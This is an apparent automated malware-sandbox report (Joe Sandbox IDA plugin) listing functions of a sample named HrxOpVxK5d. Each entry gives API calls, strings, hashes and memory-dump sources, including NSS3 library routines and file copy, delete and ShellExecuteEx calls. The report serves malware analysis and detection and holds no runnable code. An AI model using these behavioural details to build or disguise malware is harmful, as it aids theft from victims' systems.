String ID:
API String ID: 3052423345-0
Opcode ID: af24054c5641fd4eec9b0ac6e0926397dba0a79a8411d39d27791e6cd25e0048
Instruction ID: 6e2f1309b7e8a7090c6b746515b2c55ddb5c942402bb020bd0a2caf9e5753a60
Opcode Fuzzy Hash: af24054c5641fd4eec9b0ac6e0926397dba0a79a8411d39d27791e6cd25e0048
Instruction Fuzzy Hash: EB11277190C1069BFB006BBA9C04B7B3AA8BF05355F948625E9A5C7190EB31D160CB91

Function 6CFACD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6CFC1E10: TlsGetValue.KERNEL32 ref: 6CFC1E36
Part of subcall function 6CFC1E10: EnterCriticalSection.KERNEL32(?,?,?,6CF9B1EE,2404110F,?,?), ref: 6CFC1E4B
Part of subcall function 6CFC1E10: PR_Unlock.NSS3 ref: 6CFC1E76

free.MOZGLUE(?,6CFAD079,00000000,00000001), ref: 6CFACDA5
PK11_FreeSymKey.NSS3(?,6CFAD079,00000000,00000001), ref: 6CFACDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CFAD079,00000000,00000001), ref: 6CFACDCF
DeleteCriticalSection.KERNEL32(?,6CFAD079,00000000,00000001), ref: 6CFACDE2
free.MOZGLUE(?), ref: 6CFACDE9

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: a976193d10ebd9a7ac8433be021bf36109b096992a5a4b632f655085bc2ed965
Instruction ID: eb1701ff5ea7793469386c1b50acfda7a55db726e8f309db3d5779a0796ec9d2
Opcode Fuzzy Hash: a976193d10ebd9a7ac8433be021bf36109b096992a5a4b632f655085bc2ed965
Instruction Fuzzy Hash: 241170B6B01516EBEA009BA5EC84E96B76CBF042697144122E91987E01E732F435CBE1

Function 6D012D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6D015B40: PR_GetIdentitiesLayer.NSS3 ref: 6D015B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6D012D9C

Part of subcall function 6D02C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D02C2BF

PR_EnterMonitor.NSS3(?), ref: 6D012DB2
PR_EnterMonitor.NSS3(?), ref: 6D012DCF
PR_ExitMonitor.NSS3(?), ref: 6D012DF2
PR_ExitMonitor.NSS3(?), ref: 6D012E0B

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: ac39b62486f8992865a9ff5f43e27423e1716c9babac0a7e2fcc87e6519d11be
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: CE01A1B5A182049FFB309E75FC42F87B7A5EB86318F014439E95A87211D632E8258693

Function 6D012CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6D015B40: PR_GetIdentitiesLayer.NSS3 ref: 6D015B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6D012CEC

Part of subcall function 6D02C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D02C2BF

PR_EnterMonitor.NSS3(?), ref: 6D012D02
PR_EnterMonitor.NSS3(?), ref: 6D012D1F
PR_ExitMonitor.NSS3(?), ref: 6D012D42
PR_ExitMonitor.NSS3(?), ref: 6D012D5B

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: 00945fbd9363ef98714d4489cdf106745d9b97a04868f6ece2ee25937e0a798b
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: B80161B5E182009FF7309F75FC42F8BB7A5EB46318F014539E95A87221E632E9158692

Function 004193F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(02D450F8,00000000,00000000,?,00409F71,00000000,02D450F8,00000000), ref: 004193FC
lstrcpyn.KERNEL32(006D7580,02D450F8,02D450F8,?,00409F71,00000000,02D450F8), ref: 00419420
lstrlenA.KERNEL32(00000000,?,00409F71,00000000,02D450F8), ref: 00419437
wsprintfA.USER32 ref: 00419457

Strings

%s%s, xrefs: 00419445

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
Instruction ID: 36a1aade9beab669742e698a5986ef2a8e6d9b7fa0e45cca69d8a80143706e49
Opcode Fuzzy Hash: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
Instruction Fuzzy Hash: 9B011E75A18108FFCB04DFA8DD54EAE7B79EF48304F108249F9098B340EB31AA40DB96

Function 6D09ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6D09A6D8), ref: 6D09AE0D
free.MOZGLUE(?), ref: 6D09AE14
DeleteCriticalSection.KERNEL32(6D09A6D8), ref: 6D09AE36
free.MOZGLUE(?), ref: 6D09AE3D
free.MOZGLUE(00000000,00000000,?,?,6D09A6D8), ref: 6D09AE47

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: caa04691eda6d8a12bc56f7ca91604c326da4fd908f46cb62c7902a24474100e
Instruction ID: 3a31aa5d9d8f760ddab3cb8080fff902ea01f87c67220626368195a71c27dcaa
Opcode Fuzzy Hash: caa04691eda6d8a12bc56f7ca91604c326da4fd908f46cb62c7902a24474100e
Instruction Fuzzy Hash: 29F09675400A02A7DB118F68D808F5777BCBF8A7357140329F93A87540D731E125DBD9

Function 0041CA72 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041CA7E

Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0

__getptd.LIBCMT ref: 0041CA95
__amsg_exit.LIBCMT ref: 0041CAA3
__lock.LIBCMT ref: 0041CAB3
__updatetlocinfoEx_nolock.LIBCMT ref: 0041CAC7

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 8e15bae909d06919cb4135276c74b5d3530aaf41c11ecb0caa68e2a981b89e64
Instruction ID: c5a7914bfd81a4edf64c409ce704b1973edb92a02c079c255f399551119664c9
Opcode Fuzzy Hash: 8e15bae909d06919cb4135276c74b5d3530aaf41c11ecb0caa68e2a981b89e64
Instruction Fuzzy Hash: D0F06231A803189BD622FBA95C867DE33A0AF40758F50014FE405562D2CB7C59C186DE

Function 6CF16C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CF16D36

Strings

database corruption, xrefs: 6CF16D2A
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CF16D20
%s at line %d of [%.10s], xrefs: 6CF16D2F

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 5fc93484a4575136f2a34cefca822da54f1f8cecd85e8068b5961beeb5a6963a
Instruction ID: 0d99af79d5a484dd8ab7632fb950ab7a6a42c8ae75673bebc715eaf6d2c00549
Opcode Fuzzy Hash: 5fc93484a4575136f2a34cefca822da54f1f8cecd85e8068b5961beeb5a6963a
Instruction Fuzzy Hash: 5521E0716183059BC7108E1AC841B6BB7F6EF84308F24852CE8499BF91E772E9498B92

Function 004168D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416903

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

ShellExecuteEx.SHELL32(0000003C), ref: 004169C6
ExitProcess.KERNEL32 ref: 004169F5

Strings

<, xrefs: 00416979

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 3563c6cf2ded4df68359b9dda5232fc2b4ec0c335899ac8d61decc4eeb5cc28f
Instruction ID: 69e214fcc2f82cbe4d830bf51364f862e1744f727ac50a07542482e63681b1c7
Opcode Fuzzy Hash: 3563c6cf2ded4df68359b9dda5232fc2b4ec0c335899ac8d61decc4eeb5cc28f
Instruction Fuzzy Hash: 82313AB1902218ABDB14EB91DC92FDEB779AF08314F40418EF20566191DF787B88CF69

Function 6D04CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6D04CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6D04CC7B), ref: 6D04CD7A
Part of subcall function 6D04CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6D04CD8E
Part of subcall function 6D04CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6D04CDA5
Part of subcall function 6D04CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6D04CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6D04CCB5
memcpy.VCRUNTIME140(6D0E14F4,6D0E02AC,00000090), ref: 6D04CCD3
memcpy.VCRUNTIME140(6D0E1588,6D0E02AC,00000090), ref: 6D04CD2B

Part of subcall function 6CF69AC0: socket.WSOCK32(?,00000017,6CF699BE), ref: 6CF69AE6
Part of subcall function 6CF69AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CF699BE), ref: 6CF69AFC

Part of subcall function 6CF70590: closesocket.WSOCK32(6CF69A8F,?,?,6CF69A8F,00000000), ref: 6CF70597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6D04CCB0

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: e786088fb2cb6b9be56a3e482611f17929939ff429862070106d142925b5e99c
Instruction ID: cb14a64a02092060e282f7dd119cb91591b277f16be9022dad87a95e071713f9
Opcode Fuzzy Hash: e786088fb2cb6b9be56a3e482611f17929939ff429862070106d142925b5e99c
Instruction Fuzzy Hash: 3A1160F2A05240DEFB108F6A9945B667AF8A34AA18F101139F50DCF391EB7148449BD7

Function 00418EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
wsprintfW.USER32 ref: 00418F08

Strings

%hs, xrefs: 00418EFF

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
Instruction ID: abe7276d6e58fd7f286e9bcc6e4dd5022fdd169b0d4b331efbe0e5b16b2cc016
Opcode Fuzzy Hash: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
Instruction Fuzzy Hash: 47E08C70E49308BBDB00DB94ED0AF6D77B8EB44302F000196FD0987340EA719F008B96

Function 0040D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02D41C70,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D581
lstrlenA.KERNEL32(00000000), ref: 0040D798
lstrlenA.KERNEL32(00000000), ref: 0040D7AC
DeleteFileA.KERNEL32(00000000), ref: 0040D82B

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 55b01a360aa81e4daf7b60eaacf91b31aa1f6373999c79718771cc8a7263c4e2
Instruction ID: cd95120e3309aa2a4ee5e09d67847ecab6e8b781cb92854c7d2ac691bd2160a2
Opcode Fuzzy Hash: 55b01a360aa81e4daf7b60eaacf91b31aa1f6373999c79718771cc8a7263c4e2
Instruction Fuzzy Hash: CF911672E111089BCB04FBA1EC66DEE7339AF14314F50456EF11672095EF387A98CB6A

Function 6D098530 Relevance: 6.1, APIs: 4, Instructions: 127threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6D0E14E4,6D04CC70), ref: 6D098569
gethostbyaddr.WSOCK32(?,00000004,00000002), ref: 6D0985AD
GetLastError.KERNEL32(?,00000004,00000002), ref: 6D0985B6
PR_GetCurrentThread.NSS3(?,00000004,00000002), ref: 6D0985C6

Part of subcall function 6CF70F00: PR_GetPageSize.NSS3(6CF70936,FFFFE8AE,?,6CF016B7,00000000,?,6CF70936,00000000,?,6CF0204A), ref: 6CF70F1B
Part of subcall function 6CF70F00: PR_NewLogModule.NSS3(clock,6CF70936,FFFFE8AE,?,6CF016B7,00000000,?,6CF70936,00000000,?,6CF0204A), ref: 6CF70F25

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: CallCurrentErrorLastModuleOncePageSizeThreadgethostbyaddr
String ID:
API String ID: 4254312643-0
Opcode ID: ee313557b6ce129b96795ff43075554f82437addebfeb3923d45e969081c1f39
Instruction ID: 29362d6c696636b4407941cbc62bd2539198e43ee1bcfbdd98b79510a6de58cd
Opcode Fuzzy Hash: ee313557b6ce129b96795ff43075554f82437addebfeb3923d45e969081c1f39
Instruction Fuzzy Hash: 2041B0B0A08347ABFB148A34C85476AB7F4AB45338F44572ACA258F7C1D7749988EBD1

Function 6CFD0420 Relevance: 6.1, APIs: 4, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000000,?,6CFBC97F,?,?,?), ref: 6CFD04BF
TlsGetValue.KERNEL32(00000000,?,6CFBC97F,?,?,?), ref: 6CFD04F4
EnterCriticalSection.KERNEL32(?,?,?,6CFBC97F,?,?,?), ref: 6CFD050D
PR_Unlock.NSS3(?,?,?,?,6CFBC97F,?,?,?), ref: 6CFD0556

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

